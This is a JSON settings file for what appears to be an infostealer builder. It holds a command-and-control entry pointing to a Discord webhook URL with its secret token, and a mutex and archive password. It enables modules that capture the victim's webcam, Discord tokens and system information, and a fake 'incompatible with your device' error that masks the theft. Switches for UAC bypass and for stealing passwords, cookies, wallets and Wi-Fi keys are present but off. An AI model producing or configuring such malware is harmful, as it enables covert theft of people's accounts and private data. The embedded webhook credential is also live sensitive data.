{
    "settings": {
        "c2": [
            0,
            "https://discord.com/api/webhooks/1283841681443000413/cjMZbC3imMVnygJFNhCJ4n9PV9aWR7oDFsGpzyWnbyGEWVgnE0aHZKz7Pq1_XzdGrNzh"
        ],
        "mutex": "T9mXT1vXHPTQL1wz",
        "pingme": false,
        "vmprotect": false,
        "startup": false,
        "melt": false,
        "uacBypass": false,
        "archivePassword": "blank123",
        "consoleMode": 0,
        "debug": false,
        "pumpedStubSize": 0,
        "boundFileRunOnStartup": false
    },
    "modules": {
        "captureWebcam": true,
        "capturePasswords": false,
        "captureCookies": false,
        "captureHistory": false,
        "captureAutofills": false,
        "captureDiscordTokens": true,
        "captureGames": false,
        "captureWifiPasswords": false,
        "captureSystemInfo": true,
        "captureScreenshot": false,
        "captureTelegramSession": false,
        "captureCommonFiles": false,
        "captureWallets": false,
        "fakeError": [
            true,
            [
                "Uh Oh!",
                "This app is incompatible with your device",
                0
            ]
        ],
        "blockAvSites": false,
        "discordInjection": false
    }
}